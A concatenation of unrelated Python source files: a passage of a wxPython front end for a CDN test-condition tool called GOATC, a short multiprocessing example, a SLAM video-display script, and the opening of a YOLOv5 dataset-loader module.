dialog = wx.TextEntryDialog(self, "Enter Y or N",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
txt = (dialog.GetValue()).upper()
if (txt == "Y" or txt == "N"):
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + txt)
else:
wx.MessageBox("Invalid value, only Y or N allowed.", "Error")
dialog.Destroy()
def toggle_string_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter text string",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
txt = dialog.GetValue()
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + txt)
dialog.Destroy()
def __init__(self, panel, label, pos, size, default_bind = True):
super().__init__(panel, label=label, pos=pos, size=size)
self.default_label = self.GetLabel()
self.default_prefix = self.default_label.split("=")[0]
self.SetOwnForegroundColour(wx.BLACK)
goatc_buttons.append(self)
if (default_bind == True):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_binary_test_condition(event))
elif (default_bind == "Integer"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_integral_test_condition(event))
elif (default_bind == "Integer,String"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_int_comma_string_condition(event))
elif (default_bind == "YorN"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_integral_y_or_n_condition(event))
elif (default_bind == "String"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_string_condition(event))
snoring_threads = {}
window = None
hidden_label = None
label_populatedaccountname = None
label_populatedaccountname_locked = False
txtctrl_switchkey = None
txtctrl_contractid = None
combo_contractid = None
label_populatedcontractid = None
combo_populatedcontractid_locked = False
txtctrl_groupid = None
label_groupid = None
label_populatedgroupid = None
combo_populatedgroupid_locked = False
button_test_pragmas = None
def update_continuously(evt, l):
if (l != None):
p = l.GetPosition()
p.x = p.x + 1
p.y = p.y + 1
if (p.y > 10):
p.x = 0
p.y = 0
l.SetPosition((p.x,p.y))
return None;
def snore_continuously(l):
l.SetLabel("")
while l in snoring_threads:
try:
x = l.GetLabel()
x = "." + x
if (x == "..........."):
x = ""
l.SetLabel(x)
time.sleep(.5)
except:
time.sleep(.5)
def populate_property_id_nonblocking(arg=None):
global listbox_groupid
global listbox_propertyid
listbox_propertyid.Hide()
listbox_propertyid.Show()
if (listbox_groupid.GetSelection() == wx.NOT_FOUND):
wx.MessageBox("You must select a group id first.")
return None
t = threading.Thread(target=populate_property_id)
t.start()
def populate_property_id():
global property_dialog
global listbox_propertyid
global listbox_populatedpropertyid_locked
global label_populatedpropertyid
str = (listbox_groupid.GetString(listbox_groupid.GetSelection()))
strlist = str.split("\t")
if (len(strlist) < 3):
wx.MessageBox("ERROR! Invalid selection.")
return None
selectgroup = None
contractlist = []
count = 0
for ctr in strlist:
count = count + 1
if (count == 1):
selectgroup = ctr
if (count >= 3):
contractlist.append(ctr)
pprint.pprint(contractlist)
if (listbox_populatedpropertyid_locked == True):
return False
listbox_populatedpropertyid_locked = True
listbox_propertyid.Disable()
t = None
if (label_populatedpropertyid in snoring_threads):
snoring_threads.pop(label_populatedpropertyid)
t.join()
t = threading.Thread(target=snore_continuously, args=[label_populatedpropertyid])
snoring_threads[label_populatedpropertyid] = t
t.start()
file_path = os.path.realpath('goatc.py')
full_output = "\n"
for ctr in contractlist:
cmd = file_path + " --cmd ACCOUNT_PROPERTIES --switchKey " + txtctrl_switchkey.GetValue() + " --groupId " + selectgroup + " --contractId " + ctr
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
full_output = full_output + stdout.decode("utf-8") + "\n"
snoring_threads.pop(label_populatedpropertyid)
t.join()
listbox_propertyid.Hide()
listbox_propertyid.Show()
count = 0
try:
if (stderr.decode("utf-8") != ""):
label_populatedpropertyid.SetLabel("")
listbox_propertyid.Clear()
listbox_propertyid.Disable()
wx.MessageBox(stderr.decode("utf-8"),"An Error Occurred");
else:
listbox_propertyid.Clear()
groups = full_output.split("\n")
for group in groups:
if (group != ""):
count = count + 1
listbox_propertyid.Append((group.replace("|","\t")))
listbox_propertyid.Enable()
finally:
listbox_populatedpropertyid_locked = False
label_populatedpropertyid.SetLabel("")
return True
def populate_group_id_nonblocking(arg=None):
global listbox_groupid
listbox_groupid.Hide()
listbox_groupid.Show()
t = threading.Thread(target=populate_group_id)
t.start()
def populate_group_id():
global property_dialog
global listbox_groupid
global listbox_populatedgroupid_locked
if (listbox_populatedgroupid_locked == True):
return False
listbox_populatedgroupid_locked = True
listbox_groupid.Disable()
t = None
if (label_populatedgroupid in snoring_threads):
snoring_threads.pop(label_populatedgroupid)
t.join()
t = threading.Thread(target=snore_continuously, args=[label_populatedgroupid])
snoring_threads[label_populatedgroupid] = t
t.start()
file_path = os.path.realpath('goatc.py')
cmd = file_path + " --cmd ACCOUNT_GROUPS --switchKey " + txtctrl_switchkey.GetValue();
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedgroupid)
t.join()
listbox_groupid.Hide()
listbox_groupid.Show()
count = 0
try:
if (stderr.decode("utf-8") != ""):
label_populatedgroupid.SetLabel("")
listbox_groupid.Clear()
listbox_groupid.Disable()
wx.MessageBox(stderr.decode("utf-8"),"An Error Occurred");
else:
listbox_groupid.Clear()
groups = stdout.decode("utf-8").split("\n")
for group in groups:
if (group != ""):
count = count + 1
listbox_groupid.Append(urllib.parse.unquote(group.replace("|","\t")))
listbox_groupid.Enable()
finally:
listbox_populatedgroupid_locked = False
label_populatedgroupid.SetLabel("")
return True
def populate_contract_id_nonblocking(arg=None):
global txtctrl_contractid
global combo_contractid
txtctrl_contractid.Hide()
txtctrl_contractid.Show()
combo_contractid.Hide()
combo_contractid.Show()
t = threading.Thread(target=populate_contract_id)
t.start()
def populate_contract_id():
global window
global combo_contractid
global combo_populatedcontractid_locked
if (combo_populatedcontractid_locked == True):
return False
combo_populatedcontractid_locked = True
combo_contractid.Disable()
t = None
if (label_populatedcontractid in snoring_threads):
snoring_threads.pop(label_populatedcontractid)
t.join()
t = threading.Thread(target=snore_continuously, args=[label_populatedcontractid])
snoring_threads[label_populatedcontractid] = t
t.start()
file_path = os.path.realpath('goatc.py')
cmd = file_path + " --cmd ACCOUNT_CONTRACTS --switchKey " + txtctrl_switchkey.GetValue();
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedcontractid)
t.join()
combo_contractid.Hide()
combo_contractid.Show()
try:
if (stderr.decode("utf-8") != ""):
label_populatedcontractid.SetLabel("")
combo_contractid.Clear()
combo_contractid.Disable()
wx.MessageBox(stderr.decode("utf-8"),"An Error Occurred");
else:
combo_contractid.Clear()
combo_contractid.Disable()
contracts = stdout.decode("utf-8").split("\n")
for contract in contracts:
if (contract != ""):
combo_contractid.Append(contract)
combo_contractid.Enable()
try:
combo_contractid.SetSelection(0)
finally:
label_populatedcontractid.SetLabel("")
finally:
combo_populatedcontractid_locked = False
return True
def populate_account_name_nonblocking(arg=None):
global txtctrl_switchkey
txtctrl_switchkey.Hide()
txtctrl_switchkey.Show()
t = threading.Thread(target=populate_account_name)
t.start()
def populate_account_name():
global window
global label_populatedaccountname
global label_populatedaccountname_locked
if (label_populatedaccountname_locked == True):
return False
label_populatedaccountname_locked = True
t = None
if (label_populatedaccountname in snoring_threads):
snoring_threads.pop(label_populatedaccountname)
t.join()
t = threading.Thread(target=snore_continuously, args=[label_populatedaccountname])
snoring_threads[label_populatedaccountname] = t
t.start()
file_path = os.path.realpath('goatc.py')
cmd = file_path + " --cmd ACCOUNT_NAME --switchKey " + txtctrl_switchkey.GetValue();
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedaccountname)
t.join()
if (stderr.decode("utf-8") != ""):
label_populatedaccountname.SetLabel("")
wx.MessageBox(stderr.decode("utf-8"),"An Error Occurred");
else:
label_populatedaccountname.SetLabel(stdout.decode("utf-8"))
label_populatedaccountname_locked = False
return True
def showme():
contractId = get_input_args().args.contractid
if (contractId == None):
contractId = ""
groupId = get_input_args().args.groupid
if (groupId == None):
groupId = ""
propertyId = get_input_args().args.propertyid
if (propertyId == None):
propertyId = ""
versionId = get_input_args().args.versionid
if (versionId == None):
versionId = ""
app = wx.App()
global window
window = wx.Frame(None, title="GOATC UI", size=(650, 475), pos=(50,50))
panel = wx.Panel(window)
global hidden_label
hidden_label = wx.StaticText(panel, label="", pos=(0, 0))
hidden_label.Hide()
window.timer = wx.Timer(window)
window.timer.Start(100)
#window.Bind(wx.EVT_TIMER, lambda evt, temp = hidden_label: update_continuously(evt, temp))
#button_accountname = wx.Button(panel, label="Account Name ", pos=(125, 10), size=(105,20), style=wx.BU_LEFT)
#button_accountname.Bind(wx.EVT_BUTTON, populate_account_name_nonblocking)
global txtctrl_switchkey
current_key = get_api_client().current_switchkey
if current_key == None:
current_key = ""
txtctrl_switchkey = wx.TextCtrl(panel, value=current_key, pos=(10, 30))
label_switchkey = wx.StaticText(panel, label="Switch Key", pos=(10, 10))
#global label_populatedaccountname
#label_populatedaccountname = wx.StaticText(panel, label="* click [Account Name]", pos=(125, 30))
label_contractid = wx.StaticText(panel, label="Contract Id", pos=(10, 60))
#button_contractid = wx.Button(panel, label="Contract Id List ", pos=(125, 60), size=(130,20), style=wx.BU_LEFT)
#button_contractid.Bind(wx.EVT_BUTTON, populate_contract_id_nonblocking)
global txtctrl_contractid
txtctrl_contractid = wx.TextCtrl(panel, value=contractId, pos=(10, 80))
#global combo_contractid
#combo_contractid = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(125,25), pos=(125,79))
#combo_contractid.Append("* click [Contract Id List]")
#combo_contractid.SetSelection(0)
#combo_contractid.Disable()
#global label_populatedcontractid
#label_populatedcontractid = wx.StaticText(panel, label="", pos=(125, 92))
global label_groupid
label_groupid = wx.StaticText(panel, label="Group Id", pos=(10, 110))
global txtctrl_groupid
txtctrl_groupid = wx.TextCtrl(panel, value=groupId, pos=(10, 130))
#button_groupid = wx.Button(panel, label="Group Id List ", pos=(125, 110), size=(130,20), style=wx.BU_LEFT)
#button_groupid.Bind(wx.EVT_BUTTON, populate_group_id_nonblocking)
#global combo_groupid
#combo_groupid = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(125,25), pos=(125,129))
#combo_groupid.Append("* click [Group Id List]")
#combo_groupid.SetSelection(0)
#combo_groupid.Disable()
#global label_populatedgroupid
#label_populatedgroupid = wx.StaticText(panel, label="", pos=(125, 142))
label_propertyid = wx.StaticText(panel, label="Property Id", pos=(10, 160))
txtctrl_propertyid = wx.TextCtrl(panel, value=propertyId, pos=(10, 180))
label_propertyid = wx.StaticText(panel, label="Version Id", pos=(10, 210))
txtctrl_propertyid = wx.TextCtrl(panel, value=versionId, pos=(10, 230))
button_propertyselector = wx.Button(panel, label="Select Other\nProperty", pos=(10, 260), size=(105,40))
button_propertyselector.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_propertyselector.Bind(wx.EVT_BUTTON, select_other_property)
button_propertyselector = wx.Button(panel, label="Use This\nProperty", pos=(10, 300), size=(105,40))
button_propertyselector.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_accountinfo = wx.Button(panel, label="Show Helpful\nInformation", pos=(10, 340), size=(105,40))
button_accountinfo.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_cfgfile = wx.StaticText(panel, label="Configuration file:", pos=(130, 10))
label_cfgfilevalue = wx.StaticText(panel, label="[click Use This Property]", pos=(240, 10))
label_vars = wx.StaticText(panel, label="Vars:", pos=(130, 264+10))
list_vars = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(225,60), pos=(130,280+10))
button_equalsvar = wx.Button(panel, label="Equals", pos=(165, 21+10), size=(48,500))
button_equalsvar = wx.Button(panel, label="Equals", pos=(165, 21+10), size=(48,500))
button_equalsvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_novar = wx.Button(panel, label="NoVAR", pos=(213, 21+10), size=(48,500))
button_novar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_noval = wx.Button(panel, label="NoVAL", pos=(261, 21+10), size=(48,500))
button_noval.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delvar = wx.Button(panel, label="D", pos=(308, 21+10), size=(25,500))
button_delvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clrvar = wx.Button(panel, label="C", pos=(332, 21+10), size=(23,500))
button_clrvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_rsphdrs = wx.StaticText(panel, label="Rsp hdrs:", pos=(360, 264+10))
list_rsphdrs = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(230,60), pos=(360,280+10))
button_addrsphdr = wx.Button(panel, label="Add", pos=(420, 21+10), size=(40,500))
button_addrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_missrsphdr = wx.Button(panel, label="Miss", pos=(460, 21+10), size=(40,500))
button_missrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delrsphdr = wx.Button(panel, label="Del", pos=(500, 21+10), size=(40,500))
button_delrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clearrsphdr = wx.Button(panel, label="Clear", pos=(540, 21+10), size=(50,500))
button_clearrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_hostnames = wx.StaticText(panel, label="Hostnames:", pos=(130, 32))
label_populatedhostnames = wx.StaticText(panel, label="...", pos=(130, 37))
list_hostnames = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(225,75), pos=(130,53))
button_hostnames = wx.Button(panel, label="Unselect All", pos=(210, 21), size=(145,40))
button_hostnames.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_hostnames = wx.StaticText(panel, label="Req hdrs:", pos=(360, 32))
#label_populatedheaders = wx.StaticText(panel, label="...", pos=(360, 37))
list_headers = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(230,75), pos=(360,53))
button_addheader = wx.Button(panel, label="Add", pos=(420, 21), size=(40,40))
button_addheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_modheader = wx.Button(panel, label="Mod", pos=(460, 21), size=(40,40))
button_modheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delheader = wx.Button(panel, label="Del", pos=(500, 21), size=(40,40))
button_delheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clearheader = wx.Button(panel, label="Clear", pos=(540, 21), size=(50,40))
button_clearheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_status = GoatcButton(panel, label="STATUS=___", pos=(130, 120), size=(80, 40), default_bind="Integer")
button_test_status.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_cpcode = GoatcButton(panel, label="CPCODE=__________", pos=(210, 120), size=(120, 40), default_bind="Integer")
button_test_cpcode.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_sureroute = GoatcButton(panel, label="SUREROUTE", pos=(330, 120), size=(80, 40))
button_test_sureroute.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_sureroute = GoatcButton(panel, label="PREFETCH", pos=(410, 120), size=(80, 40))
button_test_sureroute.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_gzip = GoatcButton(panel, label="GZIP", pos=(490, 120), size=(40, 40))
button_test_gzip.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_nostore = GoatcButton(panel, label="NOSTOR", pos=(530, 120), size=(60, 40))
button_test_nostore.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_redirect = GoatcButton(panel, label="REDIRECT=___,_________________________________________________________", pos=(130, 142), size=(360, 40),default_bind="Integer,String")
button_test_redirect.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_cache = GoatcButton(panel, label="CACHE=__,______", pos=(490, 142), size=(100, 40),default_bind="Integer,String")
button_test_cache.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_bypass = GoatcButton(panel, label="BYPASS", pos=(130, 164), size=(60, 40))
button_test_bypass.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_exclude = GoatcButton(panel, label="EXCLUDEPARAMS", pos=(190, 164), size=(100, 40))
button_test_exclude.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logrefer = GoatcButton(panel, label="LOGREFER=_", pos=(290, 164), size=(80, 40),default_bind="YorN")
button_test_logrefer.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_loghost = GoatcButton(panel, label="LOGHOST=_", pos=(370, 164), size=(75, 40),default_bind="YorN")
button_test_loghost.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_loglang = GoatcButton(panel, label="LOGLANG=_", pos=(445, 164), size=(75, 40),default_bind="YorN")
button_test_loglang.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_keycontains = GoatcButton(panel, label="KEYCONTAINS=_________________________________________________________", pos=(130, 186), size=(360, 40),default_bind="String")
button_test_keycontains.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logcook = GoatcButton(panel, label="LOGCUSTOM=_", pos=(490, 164), size=(100, 83),default_bind="YorN")
button_test_logcook.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logcook = GoatcButton(panel, label="LOGCOOKIES=_", pos=(490, 208), size=(100, 40),default_bind="YorN")
button_test_logcook.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_keyomits = GoatcButton(panel, label="KEYOMITS=_________________________________________________________", pos=(130, 208), size=(360, 40),default_bind="String")
button_test_keyomits.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_hardcode = GoatcButton(panel, label="HARDCODE=_________________________________________________________", pos=(130, 230), size=(360, 40),default_bind="String")
button_test_hardcode.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_secpolicy = GoatcButton(panel, label="SECPOL=________", pos=(490, 208), size=(100, 40),default_bind="String")
button_test_secpolicy.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_notd = GoatcButton(panel, label="NOTD", pos=(490, 230), size=(100, 40))
button_test_notd.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
voffset = 25
label_paths = wx.StaticText(panel, label="Request path (not including hostname):", pos=(130, 355))
txtctrl_path = wx.TextCtrl(panel, value="/", pos=(375, 353), size=(215,22))
button_addtest = wx.Button(panel, label="Update Test Script List", pos=(130, 380+voffset), size=(170, 40))
button_addtest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_cleartest = wx.Button(panel, label="Reset Form", pos=(300, 380+voffset), size=(100, 40))
button_cleartest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_cleartest.Bind(wx.EVT_BUTTON, reset_form)
button_savetest = wx.Button(panel, label="Save", pos=(400, 380+voffset), size=(40, 40))
button_savetest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_copytest = wx.Button(panel, label="Copy", pos=(440, 380+voffset), size=(40, 40))
button_copytest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_runtest = wx.Button(panel, label="Load", pos=(480, 380+voffset), size=(40, 40))
button_runtest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_goatc = wx.Button(panel, label="GO ATC!", pos=(520, 380+voffset), size=(70, 40))
button_goatc.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
combo_templates = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(325,25), pos=(130,358+voffset))
button_templates = wx.Button(panel, label="Apply Template Instead", pos=(460, 350+voffset), size=(130, 40))
button_templates.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
global button_test_pragmas
button_test_pragmas = wx.CheckBox(panel, label="PRAGMAS", pos=(522, 164), size=(95, 40))
button_test_pragmas.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
window.Show(True)
app.MainLoop()
while len(snoring_threads) > 0:
try:
for t in snoring_threads:
th = snoring_threads.pop(t)
th.join()
except:
print_err("Cleaning up threads...\n")
util.die(0, "UI window closed. Exiting gracefully.")
|
mp.py | import multiprocessing as mp
def foo(q):
q.put('hello')
if __name__ == '__main__':
mp.set_start_method('spawn')
q = mp.Queue()
p = mp.Process(target=foo, args=(q,))
p.start()
print(q.get())
p.join() |
jslam.py | #! /home/johk/anaconda3/envs/slam/bin/python
import cv2
import numpy as np
from matplotlib import pyplot as plt
from Components.display import Display
from Components.display3 import D3Engine
import keyboard
import time
from threading import Thread
if __name__ == "__main__":
start_time = time.time()
cap = cv2.VideoCapture("videos/fastcar.mp4")
H = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) // 2
W = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) // 2
# extractor = Extractor()
display = Display(W, H)
engine3D = D3Engine()
threads = []
while 1:
# Capture frame by frame and scale it down
ret, frame = cap.read()
if keyboard.is_pressed("q") or not ret:
print("Quitting")
print("Program ran for {} Seconds".format(int(time.time() - start_time)))
break
frame = cv2.resize(frame, (W, H), interpolation=cv2.INTER_LINEAR)
# Our operations on the frame come here
# rgb = cv2.cvtColor(frame, cv2.COLOR_RGBA2RGB)
# Imshow not working on the current opencv version
# cv2.imshow('frame', rgb)
display.displayVideo(frame)
if not threads:
process = Thread(target=engine3D.display)
process.start()
threads.append(process)
# When everything done, release the capture
print("Cleaning up....")
display.cleanUp()
# cap.release()
# cv2.destroyAllWindows()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import check_requirements, xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, \
resample_segments, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
